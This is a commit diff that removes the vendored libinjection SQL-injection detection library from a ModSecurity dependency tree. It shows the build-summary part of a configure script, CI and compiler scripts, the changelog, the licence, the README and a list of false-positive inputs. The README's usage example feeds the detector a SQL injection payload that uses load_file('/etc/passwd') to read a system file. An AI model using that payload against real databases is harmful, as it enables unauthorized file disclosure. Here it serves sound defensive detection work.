echo " * (GeoIP) v${GEOIP_VERSION}"
echo " ${GEOIP_DISPLAY}"
fi
fi
if test "x$GEOIP_FOUND" = "x2" && test "x$MAXMIND_FOUND" = "x2"; then
echo " + GeoIP/MaxMind ....disabled"
fi
## LibCurl
if test "x$CURL_FOUND" = "x0"; then
echo " + LibCURL ....not found"
fi
if test "x$CURL_FOUND" = "x1"; then
echo -n " + LibCURL ....found "
if ! test "x$CURL_VERSION" = "x"; then
echo "v${CURL_VERSION}"
else
echo ""
fi
echo " ${CURL_DISPLAY}"
fi
if test "x$CURL_FOUND" = "x2"; then
echo " + LibCURL ....disabled"
fi
## YAJL
if test "x$YAJL_FOUND" = "x0"; then
echo " + YAJL ....not found"
fi
if test "x$YAJL_FOUND" = "x1"; then
echo -n " + YAJL ....found "
if ! test "x$YAJL_VERSION" = "x"; then
echo "v${YAJL_VERSION}"
else
echo ""
fi
echo " ${YAJL_DISPLAY}"
fi
if test "x$YAJL_FOUND" = "x2"; then
echo " + YAJL ....disabled"
fi
## LMDB
if test "x$LMDB_FOUND" = "x0"; then
echo " + LMDB ....not found"
fi
if test "x$LMDB_FOUND" = "x1"; then
echo -n " + LMDB ....found "
if ! test "x$LMDB_VERSION" = "x"; then
echo "v${LMDB_VERSION}"
else
echo ""
fi
echo " ${LMDB_DISPLAY}"
fi
if test "x$LMDB_FOUND" = "x2"; then
echo " + LMDB ....disabled"
fi
## libxml2
if test "x$LIBXML2_FOUND" = "x0"; then
echo " + LibXML2 ....not found"
fi
if test "x$LIBXML2_FOUND" = "x1"; then
echo -n " + LibXML2 ....found "
if ! test "x$LIBXML2_VERSION" = "x"; then
echo "v${LIBXML2_VERSION}"
else
echo ""
fi
echo " ${LIBXML2_DISPLAY}"
fi
if test "x$LIBXML2_FOUND" = "x2"; then
echo " + LibXML2 ....disabled"
fi
## SSDEEP
if test "x$SSDEEP_FOUND" = "x0"; then
echo " + SSDEEP ....not found"
fi
if test "x$SSDEEP_FOUND" = "x1"; then
echo -n " + SSDEEP ....found "
if ! test "x$SSDEEP_VERSION" = "x"; then
echo "v${SSDEEP_VERSION}"
else
echo ""
fi
echo " ${SSDEEP_DISPLAY}"
fi
if test "x$SSDEEP_FOUND" = "x2"; then
echo " + SSDEEP ....disabled"
fi
## LUA
if test "x$LUA_FOUND" = "x0"; then
echo " + LUA ....not found"
fi
if test "x$LUA_FOUND" = "x1"; then
echo -n " + LUA ....found "
if ! test "x$LUA_VERSION" = "x"; then
echo "v${LUA_VERSION}"
else
echo ""
fi
echo " ${LUA_DISPLAY}"
fi
if test "x$LUA_FOUND" = "x2"; then
echo " + LUA ....disabled"
fi
## PCRE2
if test "x$PCRE2_FOUND" = "x0"; then
echo " + PCRE2 ....not found"
fi
if test "x$PCRE2_FOUND" = "x1"; then
echo -n " + PCRE2 ....found "
if ! test "x$PCRE2_VERSION" = "x"; then
echo "v${PCRE2_VERSION}"
else
echo ""
fi
echo " ${PCRE2_DISPLAY}"
fi
if test "x$PCRE2_FOUND" = "x2"; then
echo " + PCRE2 ....disabled"
fi
echo " "
echo " Other Options"
if test $buildTestUtilities = true; then
if test $debugLogs = true; then
echo " + Test Utilities ....enabled"
else
echo " + Test Utilities ....partially"
fi
else
echo " + Test Utilities ....disabled"
fi
if test $debugLogs = true; then
echo " + SecDebugLog ....enabled"
else
echo " + SecDebugLog ....disabled"
fi
if test "$aflFuzzer" = "true"; then
echo " + afl fuzzer ....enabled"
echo " ($FUZZ_CPPCFLAGS)"
else
echo " + afl fuzzer ....disabled"
fi
if test "$buildExamples" = "true"; then
echo " + library examples ....enabled"
else
echo " + library examples ....disabled"
fi
if test "$buildParser" = "true"; then
echo " + Building parser ....enabled"
else
echo " + Building parser ....disabled"
fi
if test "$mutexPm" = "true"; then
echo " + Treating pm operations as critical section ....enabled"
else
echo " + Treating pm operations as critical section ....disabled"
fi
echo " "
if test "$aflFuzzer" = "true"; then
echo "WARNING: afl fuzzer was enabled. Make sure you are using the"
echo " 'afl-clang-fast' as the compiler, otherwise the compilation"
echo " will fail."
echo " "
echo " You can set the compiler using:"
echo " "
echo " $ export CXX=afl-clang-fast++ "
echo " $ export CC=afl-clang-fast "
echo " "
fi

87
src/deps/src/ModSecurity/others/libinjection/.github/workflows/ci.yml vendored
View File

@ -1,87 +0,0 @@
name: CI
on:
push:
pull_request:
jobs:
cppcheck:
runs-on: ubuntu-20.04
name: cppcheck
steps:
- uses: actions/checkout@v2
name: checkout repo
- name: Setup Dependencies
run: |
sudo apt-get update -y -qq
sudo apt-get install cppcheck
- name: cppcheck
run: |
cppcheck --std=c89 \
--enable=all \
--inconclusive \
--suppress=variableScope \
--suppress=missingIncludeSystem \
--quiet \
--error-exitcode=1 \
--template='{file}:{line} {id} {severity} {message}' \
.
clang-static:
runs-on: ubuntu-20.04
name: clang static check
steps:
- uses: actions/checkout@v2
name: checkout repo
- name: make analyze
run: make analyze
working-directory: src
env:
CFLAGS: '-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror'
build-linux:
runs-on: ${{ matrix.os }}
strategy:
matrix:
os: [ubuntu-20.04, ubuntu-18.04, ubuntu-16.04]
platform: [x32, x64]
compiler: [gcc, clang]
steps:
- uses: actions/checkout@v2
- name: Setup Dependencies
run: |
sudo apt-get update -y -qq
sudo apt-get install valgrind
- name: build
run: make all
- name: test
run: make -e check
- name: clean
run: make clean
- name: build pedantic
run: make all
env:
CFLAGS: '-Wall -Wextra -Werror -pedantic -ansi -g -O1'
- name: test valgrind
run: make -e check
env:
VALGRIND: 'valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/home/runner/work/libinjection/libinjection/src/alpine.supp'
build-macos:
runs-on: ${{ matrix.os }}
strategy:
matrix:
os: [macos-10.15]
compiler: [gcc, clang]
steps:
- uses: actions/checkout@v2
- name: build
run: make all
- name: test
run: make -e check
- name: clean
run: make clean
- name: build pedantic
run: make all
env:
CFLAGS: '-Wall -Wextra -Werror -pedantic -ansi -g -O1'

46
src/deps/src/ModSecurity/others/libinjection/.gitignore vendored
View File

@ -1,46 +0,0 @@
*~
*.pyc
*.dSYM
c/#*
*.plist
*.info
*.gch
*.gcov
# gnu autotest
*.trs
#aclocal.m4
app.info
autom4te.cache
#compile
config.h
#config.h.in
#config.guess
config.log
config.status
#config.sub
#configure
configure.scan
coverage_report
#depcomp
#install-sh
#libtool
#ltmain.sh
#Makefile.in
#m4
#missing
stamp-h1
*~
*.html
*.log
*.o
*.la
*.so*
*.a
.deps
*.tar*
*.zip
*.lo
*.gcno
*.gcda

2
src/deps/src/ModSecurity/others/libinjection/CHANGELOG
View File

@ -1,2 +0,0 @@
see CHANGELOG.md

288
src/deps/src/ModSecurity/others/libinjection/CHANGELOG.md
View File

@ -1,288 +0,0 @@
# NEXT
* [#126](/client9/libinjection/issues/126) oracle false negative
* [#117](/client9/libinjection/issues/117) [#116](/client9/libinjection/issues/116) - overread in XSS
* [#112](/client9/libinjection/issues/112) fix shared library on macOS
* [#122](/client9/libinjection/issues/122) [#115](/client9/libinjection/issues/115) - false positive issue for XSS
* [#113](/client9/libinjection/issues/113) save space in struct
* [#126](/client9/libinjection/issues/126) add usage to sqli cli tool
* [#125](/client9/libinjection/issues/125) many false positives
* [#114](/client9/libinjection/issues/114) false negative with TSQL and "IF NOT" operation
# v3.9.2 - 2016-05-21
* Release of whatever changes have been made over the last 2.5 years.
# v3.9.1 - 2013-12-26
Day-After-Christmas Edition
* No functional changes
* Code reverted to strict C90 style to allow builds on embedded systems, Windows and FreeBSD
* For gcc this means `-std=c90 -pedantic`, which seems to simulate Windows behavior on Linux
* Other minor style changes to header files.
# v3.9.0 - 2013-11-29
Black Friday Edition
* Big API Change!! everything in `libinjection.h` is now `libinjection_sqli.h`. And a new super simple API is in `libinjection.h`
* Improvements to folder to prevent bypasses using SQL types (casts). This eliminated about 400 fingerprints as well.
* Blacklisted a very degenerate MySQL ODBC case, that is highly unlike to be used in 'real inputs'. thanks to @LightOS foreporting.. not clear who found it originally.
* Over 400 unit tests now!
* Compiles clean under clang with `-Weverything -Wno-padded` `-Wno-padded` is excluded since it's architecture dependant. See `clang.sh` to see how to invoke.
* PHP documentation fixes, thanks @LightOS
# v3.8.0 - 2013-10-18
LAMP Special Edition: MySQL and PHP improvements
* [Issue #33](https://github.com/client9/libinjection/issues/54) Fixes MySQL in latin1-mode use of `%A0` as whitespace. This was tricky since `%A0` might be part of larger UTF-8 encoding as well. Or perhaps `%C2%A0` (utf-8 encoding) might be treated as whitespace. Fortunately, MySQL only seems to treat `%A0` as whitespace in latin1 mode. HT [@ru_raz0r](https://twitter.com/ru_raz0r)
* Fixes to Lua testdriver and portability fixes
* Much improved PHP build and test. It now uses `phpize` and builds and tests like a real module.
* API CHANGE: the macro `LIBINJECTION_VERSION` has been replaced by `const char* libinjection_version()`. This allows us to increment the version number without having to regenerate SWIG (or other) bindings for minor releases.
NOTE:
Pregenerated [SWIG](http://www.swig.org/) bindings are removed. You'll need to install SWIG before running `make`. SWIG is packaged on virtually every OS so this should not be a problem.
Here's why:
* Latest versions of swig appear to generate poor quality bindings for LUA and Python. Bugs are filed upstream [1341](https://sourceforge.net/p/swig/bugs/1341/), [1343](https://sourceforge.net/p/swig/bugs/1343/), [1345](https://sourceforge.net/p/swig/bugs/1345/). These are fixed or will be fixed in swig 3.0.0.
* In addition, I've received a number of reports of generated code failing various static analysis
* I can't triangulate which SWIG for which language for which OS will work for you
* I may be switching to [libffi](http://cffi.readthedocs.org/) for python, and [luajit.ffi](http://luajit.org/ext_ffi.html) for lua(jit) in the future, anyways.
# v3.7.1 -- 2013-10-13
* Remove un-needed code
# v3.7.0 -- 2013-10-13
Major Release
* [Issue #54](https://github.com/client9/libinjection/issues/54): Add test vectors from [Arne Swinnen](http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/). Thanks [qerub@github](https://github.com/qerub)
* Minor fingerprint update for [Issue #54](https://github.com/client9/libinjection/issues/54). I don't really think it's valid SQL but it's safe enough to detect without false positives.
* [Issue #55](https://github.com/client9/libinjection/issues/55): Parse MS SQLSERVER use of \[brackets\] for column and table names. This is a big one that closes a lot of holes. Thanks [nroggle@github](https://github.com/nroggel)
* [Issue #56](https://github.com/client9/libinjection/issues/56): fix buffer over-read. Thanks [safe3@github](https://github.com/Safe3) and [flily@github](https://github.com/flily)
* Remove use of `-fstack-protector` as it breaks valgrind detecting memory problems
Read more about it http://blog.client9.com/2013/10/12/gcc-valgrind-stackprotector.html
* Fixed folding issue where `1,-sin(1))` would be folded as `1 (1)`
* Add more test cases and improved test coverage to [98.8%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
# v3.6.0 -- 2013-09-11
* New PHP API
* Big fingerprint update
** about 500 new fingerprints added based on fuzzing tests by Reto Ischi
** about 700 impossible, dead fingerprints removed
** adding folding rule for "sqltype sqltype -> sqltype" since
`select binary binary binary 1` is valid
* Other minor fingerprints added
* -maybe- API change as typedefs and structs were re-arranged for SWIG
# v3.5.3 -- 2013-08-25
* Fingerprint update -- `BETWEEN` operation bypasses
* Fingerprint update -- `ANY/SOME` quasi-function bypasses
* Fixed issue with folding where `1-(2-3)` would fold to "nothing" instead of `1`
* Improved test coverage to [98.0%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
* More adjustments to the PHP/MYSQL backtick to reduce false positives
# v3.5.2 -- 2013-08-21
* Fingerprint update. Credit: Reto Ischi
# v3.5.1 -- 2013-08-21
* found regression in handling of PHP/MySQL backticks. Tests added
* Dead code removed.
* Improved test coverage to [97.7%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
# v3.5.0 -- 2013-08-21
* Bug fix for libinjection_sqli_reset @brianrectanus
https://github.com/client9/libinjection/pull/50
* Non-critical parser fix for numbers with oracle's ending
suffix. "SELECT 1FROM .." -> (SELECT, 1, FROM) not
(SELECT, 1F, ROM)
* Yet another fix for disambiguating Oracle's "f" suffix for numbers HT @LightOS
* Better parsing of generated number forms of "10.e" and "10.10e"
(these are actually table specifiers!) HT @LightOS
* Change sizing of some static arrays to have a length >= 8
For GCC based applications, this allows -fstack-protector to work
and -Wstack-protector will now not emit errors.
* Added '-fstack-protector-all -D_FORTIFY_SOURCE=2' to default CFLAGS.
About 10% performance loss with -fstack-protector-all
* Improvements in reducing false positives, HT modsecurity team
* Add fingerprint, HT @FluxReiners
* Support for parsing of old ODBC-style typing, e.g. 'select {foo 1};' (valid in MySQL)
* Fix tokenization of "IF EXISTS(....", "IF NOT EXISTS(..."
* Fi possible stack over-read, and improve detection of "sp_password" flag
in short sqli HT modsecurity team
# v3.4.1 2013-07-18
* Fingerprint update only HT @LightOS
# v3.4.0 2013-07-18
* Fix regression with COLLATE
* Handle "procedure analyze" under MySQL
* Make API most robust when setting flags
* Add folding API
* Add new all-C test driver to improve testing speed
* Makefile cleanups
* Fired Jenkins! Using in-house system.
* Fixed bypass reported by @FluxReiners
# v3.3.0 2013-07-13
* change how backslash is handled to catch old MSSQL servers sqli
See http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
for details
* Reworking of COLLATE to handle MySQL, TSQL types automatically
* Handle bizarro world TSQL '\%1' which is parsed as "0 % 1"
* Better stacked query detection, fixing some regressions
* Folding improvements
* False positive improvements
# v3.2.0 2013-07-12
* Parse binary litterals "0b010101" used by at least mysql and pgsql
* Add fingerprints '1&EUE', '1&EkU' to work around ambiguous parsing rules
"-1.for" == '-1.f OR' vs. '-1. FOR' CREDIT @LightOS
* Add parsing rules for COLLATION in MySQL, CREDIT @LightOS
* Reduce false positives by removing all fingerprints that contained "sn"
* Improvement in handling MySQL 'binary' quasi-operator/type
* Improvements in folding
* Removed dependency on SWIG for installing python module
# v3.1.0 2013-07-02
* Fix for parsing Oracle numeric literals
* Fix for oracle whitespace with null char.
* Add unusual SQL join types to keywords lists
* Minor fixes to python API examples
# v3.0.0 2013-06-23
Big Release and Big Engine change. Highly recommend
* Numerous evasions and false positives fixed!
* Tokenizer is now really dumb, and publically exposed. See `libinjection_sqli_tokenize`.
* Folding engine completely rewritten to be simpler and easier to extend, debug, port.
* MySQL `backticks` now handled correctly
* @"var" and @'var' parsed correctly (mysql)
* ":=" operator parsed correctly
* non-ascii SQL variables and barewords handled correctly
* less false positives and those that are false positives
are more "indeterminate cases" and are only in a few
fingerprints
* autogeneration of fingerprints with trivial SQL variations
* support for pgsql $ strings
* support for oracle's q and nq strings
* support for mysql's n strings
* parsing stats exposed
* new swig bindings for python and lua, with callbacks into original scripting
language for accept/reject of fingerprints (i.e. manage fingerprints in
script, not C code)
* Improved parsing of various special cases in MySQL
* Ban MySQL conditional comments. If we find them, it's marked as SQLi immediately.
* Probably a bunch of other stuff too
# v2.0.4 2013-05-21 IMPORTANT
All users are advised to upgrade due to risk of DOS
## security
* more fingerprints, more tests
* Issue 34: fix infinite loop
# v2.0.3 2013-05-21
## security
* Add variations on '1U(((', thanks @LightOS
* Add automatically all variations on other cases of
'parens padding'
# v2.0.2 2013-05-21
## security
* Added fingerprint 'nU(kn' and variations, thanks to
discussion with @ModSecurity .
# v2.0.1 2013-05-21
## security
* Added fingerprint knknk, thanks @d0znpp
# v2.0.0 2013-05-17
Version 2 is more a software engineering release than SQLi.
The API, the code, and filenames are improved for embedded
use. Please see the README.md file for details on use.
## security
* Fix Issue30: detection of more small sqli forms with fingerprint "1c".
* Fix Issue32: false positive of '*/*' of type 'oc' Thanks to @brianrectanus
## API Changes
BIG CHANGES
* File name changes. These are the only relevant files:
* `c/libinjection.h`
* `c/libinjection_sqli.c`
* `c/libinjection_sqli_data.h`
* `COPYING`
* Just need to include `libinjection.h` and link with `libinjection_sqli_.c`
* `sqlparse_private.h` and `sqli_fingerprints.h` are deprecated.
Only use `#include "libinjection.h"`
* API name changes `is_sqli` and `is_string_sqli` are now
`libinjection_is_sqli` and `libinjection_is_string_sqli`
* API change, `libinjection_is_sqli` now takes a 5th arg for callback data
* API change, `libinjection_is_sqli` accepts `NULL` for arg4 and arg5
in which case, a default lookup of fingerprints is used.
* `sqlmap_data.json` now includes fingerprint information, so people making
ports only need to parse one file.
## other
* Allow `clang` compiler (also in Jenkins, a build with clang and
make-scan is done)
* Optimizations should result in > 10% performance improvement
for normal workloads
* Add `sqlite3` special functions and keywords (since why not)
# v1.2.0 2013-05-06
## security
* fix regression in detecting SQLi of type '1c'
##
* improved documentation, comments, edits.
# v1.1.0 2013-05-04
## security
* Fix for nested c-style comments used by postgresql and transact-sql.
Thanks to @Kanatoko for the report.
* Numerous additions to SQL functions lists (in particular pgsql, transact-sql
and ms-access functions)
Thanks to Christoffer Sawicki (GitHub "qerub") for report on cut-n-paste error.
Thanks to @ryancbarnett for reminder that MS-ACCESS exists ;-)
* Adding of fingerprints to detect HPP attacks.
* Algorihmically added new fingerprints to detect new _future_ sqli attacks. All of these
new fingerprints have no been seen 'in the wild' yet.
## other
* Replaced BSD memmem with optimzed version. This eliminates all 3rd party code.
* Added alpha python module (python setup.py install)
* Added sqlparse_fingerprints.h and sqlparse_data.json to aid porting and embeddeding.
* Added version number in sqlparse.h, based on
http://www.python.org/dev/peps/pep-0386/#normalizedversion
# v1.0.0 2013-04-24
* retroactive initial release
* all memory issues fixed

32
src/deps/src/ModSecurity/others/libinjection/COPYING
View File

@ -1,32 +0,0 @@
Copyright (c) 2012-2016, Nick Galbreath
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
https://github.com/client9/libinjection
http://opensource.org/licenses/BSD-3-Clause

110
src/deps/src/ModSecurity/others/libinjection/README.md
View File

@ -1,110 +0,0 @@
<img src="https://raw.githubusercontent.com/libinjection/libinjection/main/misc/libinjection.svg" width="70%">
![CI](https://github.com/libinjection/libinjection/workflows/CI/badge.svg)
[![license](https://img.shields.io/badge/license-BSD_3--Clause-blue.svg?style=flat)](https://raw.githubusercontent.com/client9/libinjection/master/COPYING)
SQL / SQLI tokenizer parser analyzer. For
* C and C++
* [PHP](https://libinjection.client9.com/doc-sqli-php)
* [Python](https://libinjection.client9.com/doc-sqli-python)
* [Lua](/lua)
* [Java](https://github.com/jeonglee/Libinjection) (external port)
* [LuaJIT/FFI] (https://github.com/p0pr0ck5/lua-ffi-libinjection) (external port)
See
[https://www.client9.com/](https://www.client9.com/)
for details and presentations.
Simple example:
```c
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include "libinjection.h"
#include "libinjection_sqli.h"
int main(int argc, const char* argv[])
{
struct libinjection_sqli_state state;
int issqli;
const char* input = argv[1];
size_t slen = strlen(input);
/* in real-world, you would url-decode the input, etc */
libinjection_sqli_init(&state, input, slen, FLAG_NONE);
issqli = libinjection_is_sqli(&state);
if (issqli) {
fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint);
}
return issqli;
}
```
```
$ gcc -Wall -Wextra examples.c libinjection_sqli.c
$ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
sqli detected with fingerprint of 's&1UE'
```
More advanced samples:
* [sqli_cli.c](/src/sqli_cli.c)
* [reader.c](/src/reader.c)
* [fptool](/src/fptool.c)
VERSION INFORMATION
===================
See [CHANGELOG](/CHANGELOG) for details.
Versions are listed as "major.minor.point"
Major are significant changes to the API and/or fingerprint format.
Applications will need recompiling and/or refactoring.
Minor are C code changes. These may include
* logical change to detect or suppress
* optimization changes
* code refactoring
Point releases are purely data changes. These may be safely applied.
QUALITY AND DIAGNOSITICS
========================
The continuous integration results at
https://travis-ci.org/client9/libinjection tests the following:
- [x] build and unit-tests under GCC
- [x] build and unit-tests under Clang
- [x] static analysis using [clang static analyzer](http://clang-analyzer.llvm.org)
- [x] static analysis using [cppcheck](https://github.com/danmar/cppcheck)
- [x] checks for memory errors using [valgrind](http://valgrind.org/)
LICENSE
=============
Copyright (c) 2012-2016 Nick Galbreath
Licensed under the standard [BSD 3-Clause](http://opensource.org/licenses/BSD-3-Clause) open source
license. See [COPYING](/COPYING) for details.
EMBEDDING
=============
The [src](https://github.com/client9/libinjection/tree/master/src)
directory contains everything, but you only need to copy the following
into your source tree:
* [src/libinjection.h](/src/libinjection.h)
* [src/libinjection_sqli.c](/src/libinjection_sqli.c)
* [src/libinjection_sqli_data.h](/src/libinjection_sqli_data.h)
* [COPYING](/COPYING)

33
src/deps/src/ModSecurity/others/libinjection/RELEASE-HOWTO.md
View File

@ -1,33 +0,0 @@
# libinjection release howto
Comments and improvements welcome.
## Update the internal version number
in `src/libinjection_sqli.c` edit the definition
```c
#define LIBINJECTION_VERSION "3.9.1"
```
## Update the CHANGELOG.md file
There isn't much of specific format. It's not GNU changelog style. Just make sure it looks good in markdown.
## test and commit
Something like this
```sh
make test
git commit -m 'VERSION'
```
## run ./tags.sh
This will get the version number from the file above and create a local
and remote tag.
## HELP!
I would be great to dump a src tarball on github releases.

20
src/deps/src/ModSecurity/others/libinjection/configure-clang-asan.sh
View File

@ -1,20 +0,0 @@
#!/bin/sh
set -e
#
# adjust as needed for your clang setup
#
# -Wno-padded padding can change by OS/version this check is really
# for embedded systems so it's ok to skip
#
# -Wno-covered-switch-default Don't warn if we have a switch that
# covers all of an enum AND we have a default. enums are only loosely
# typed, it's good to have a default: assert(0) in case someone does
# a bad cast, etc also this conflicts with GCC checks.
#
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
# stdout and stdin definitions
#
make clean
export CC=clang
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror -fsanitize=address"
make -e check

20
src/deps/src/ModSecurity/others/libinjection/configure-clang.sh
View File

@ -1,20 +0,0 @@
#!/bin/sh
set -e
#
# adjust as needed for your clang setup
#
# -Wno-padded padding can change by OS/version this check is really
# for embedded systems so it's ok to skip
#
# -Wno-covered-switch-default Don't warn if we have a switch that
# covers all of an enum AND we have a default. enums are only loosely
# typed, it's good to have a default: assert(0) in case someone does
# a bad cast, etc also this conflicts with GCC checks.
#
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
# stdout and stdin definitions
#
make clean
export CC=clang
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror"
make -e check

16
src/deps/src/ModSecurity/others/libinjection/configure-gcc-hardened.sh
View File

@ -1,16 +0,0 @@
#!/bin/sh
set -e
#
# See https://wiki.debian.org/Hardening for details
#
# -Wno-padded padding can change by OS/version this check is really
# for embedded systems so it's ok to skip
#
# -Wno-covered-switch-default Don't warn if we have a switch that
# covers all of an enum AND we have a default. enums are only loosely
# typed, it's good to have a default: assert(0) in case someone does
# a bad cast, etc also this conflicts with GCC checks.
#
make clean
export CFLAGS="-g -O3 -pie -fPIE -fPIC -fstack-protector --param ssp-buffer-size=4 -Wall -Wextra -Wformat -Wformat-security -Werror -Wcast-align -Wshadow -Wpointer-arith -Wcast-qual -Wstack-protector -D_FORTIFY_SOURCE=2 -ansi -pedantic"
make -e

11
src/deps/src/ModSecurity/others/libinjection/configure-gcov.sh
View File

@ -1,11 +0,0 @@
#!/bin/sh
set -e
#
# gprof build
#
make clean
export CC=gcc
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
make -e

9
src/deps/src/ModSecurity/others/libinjection/configure-gprof.sh
View File

@ -1,9 +0,0 @@
#!/bin/sh
set -e
#
# gprof build
#
make clean
export CFLAGS="-O2 -pg -ansi"
make -e

12
src/deps/src/ModSecurity/others/libinjection/data/README.md
View File

@ -1,12 +0,0 @@
Files in this directory are sample input for SQLi or false positives
Lines that are empty or start with `#` ignored. Otherwise they should
be URL-encoded "user input" as might be found in query string.
Each of the `sqli-\*.txt` files should generate a sqli match (with a few
outliers).
The `false-positive.txt` file are inputs that in the process of
development where falsely marked as sqli.

443
src/deps/src/ModSecurity/others/libinjection/data/false_positives.txt
View File

@ -1,443 +0,0 @@
#
# List of various inputs that failed and caused a false positive
#
24-7-TEAM
A-LAST-MINUTE
1/26/11
TRUE#LAST
1D0AA0A700000004/9GUH7NYWTMDHBAA CTFT0FG7/W4AWAABAAAAGK0WQAGHAAAAGAAABJMCGA=
HTTP://WWW.TINYBELLESBLOG.COM/2011/11/2ND-ANNIVERSARY3K-FAN-GIVEAWAY.HTML#{"COLOR":"#2A1100","BACKGROUNDCOLOR":"WHITE","UNVISITEDLINKCOLOR":"#D860A7","FONTFAMILY":"GEORGIA, SERIF"}
NOT ALL WHO WANDER
ALL NATURAL SKIN CARE
DAD TO BE
UNIQUE TABLE RUNNER
AS FOR ME AND MY HOUSE
LOCK AND KEY
1 BY 1 INCH PILLOWS
SET WITH ENVELOPES
FROM TO TAG CHRISTMAS
3 BY 5 RECIPE CARDS
3 TO 6 MONTHS
BY ORDER OF THE MANAGEMENT
A IS FOR ADORABLE
WHERE IS GEORGE
KEY TO MY HEART
Y'ALL COME BACK NOW
1950's dresses
EC-2HM85288X8372881C
4/_ZBKO2JKUCJC73C8KPIUDTJ3IMGM
MATS 5" BY 7"
I'M AFRAID SO. YOU'RE ENTIRELY BONKERS. BUT I'LL TELL YOU A SECRET THE BEST PEOPLE ARE" - ALICE
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE
JACK-O'-LANTERN?
7 AND A HALF
7 FOR ALL MANKIND
5 AND A QUARTER BY 8 INCHES
40 AND FAB
6 KEY CHAR
3 FOR 20
F AND A NECKLACE
21 LONG IN
FD AND C COSMETIC COLORANT
2 OR 4 METAL BUTTONS
13 IS A LUCKY NUMBER
1 AND 1/2" BUTTON
"DARE TO BE AWESOME":
"ALASKA" + 1978
10 DOUBLE LOOP SETS
B IS FOR BLACK BY TATIANA SOROKA
DANCIN' LIKE A ROBOT ON FIRE
D AND D DICE
BE TRUE 2 U
B AND A PRINTS
"SWEATER DRESS" AND "CHRISTMAS"
SMALL "& SIGN
9-2-5 BLACK PUMPS
2-3/4 CELLO BAGS
30-30-60 INVITE
11-11-11 DAY POPPY
4-1-7-CUEIPNJF1QIETPB8PQBVZ5
1-1/8 PLUGS
1 1/8 PLUGS
1&1/8 PLUGS
909-527-9247
+1 (917) 666-0987
(9178787873)
(junk)
"PINK ROSES" -DRESS -CLOTHES -SWEATER -COAT -JACKET -SKIRT -PANTS -SHIRT
DRESS SIZE 20" -PATTERN -BABY
"CROSS STITCH" -PDF -WOOL
DRESS WITH HAT 18';
2:1320316063:9-3Z6OMATJOWG5BO2JWF3I2S0QEN:XXMET8ACIJ1CVLEHB5MBBW-NPIEQ:0440D7CD127A7FBFCB9D17B01D38FB0A7C0EBC11
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE - STEAMPUNKVINTAGEFIND AT ETSY G194
IN ORDER TO USE SEARCH
BEGIN EACH DAY WITH LOVE
SQL-3-RMGN_V-BBNGV40NGQRAGGZ
IF-9-86MDXMB1Z-FINBSB4WIDF-B
HTTP://CONTUBO.TV/VIDEOS/1949/2-BEST-MINIFALDAS,-TANGAS,CULONAS-MINISKIRTS"-BIKINIS-"SEXY-GIRLS"-BOOBIES-BOOTTIES
GROUP UPDATE FACEBOOK LINK NOT PROVIDED
CHRISTMAS STOCKING "NOT" STUFFER
ORDER@ALLTHATSHEWANTS.US
ALL@MKSAT.NET
ALL NATURAL SHA
WHERE IS THE SHOW
"ALASKA" + 1978
SMALL "&" SIGN
50%2526%252339%253Bs
VINTAGE CARVED BEAD'" -LUCITE -PLASTIC
pr_shop%22%3EMamaBearBabyWear%3C/a%3E
poem+'if'
CRAFT SHOW SET
DIARY WITH LOCK
CLIP ON READ
CLOCK WITH KEYS
THERE IS NOT PLACE LIKE HOME
BASE; SET SWAROVSKI
LED -(ZEPPELIN)
LIFE IS NOT ABOUT WAITING FOR THE STORM TO PASS
70" ROUND TABLE CLOTH
"CASE"
"RIGHT ON"
"NOT ALL WHO WANDER"
V1_OTHER_1"><IMG CLASS="SIZE-FULL WP-IMAGE-2764
CAT2_GALLERY_20">ETSY</A
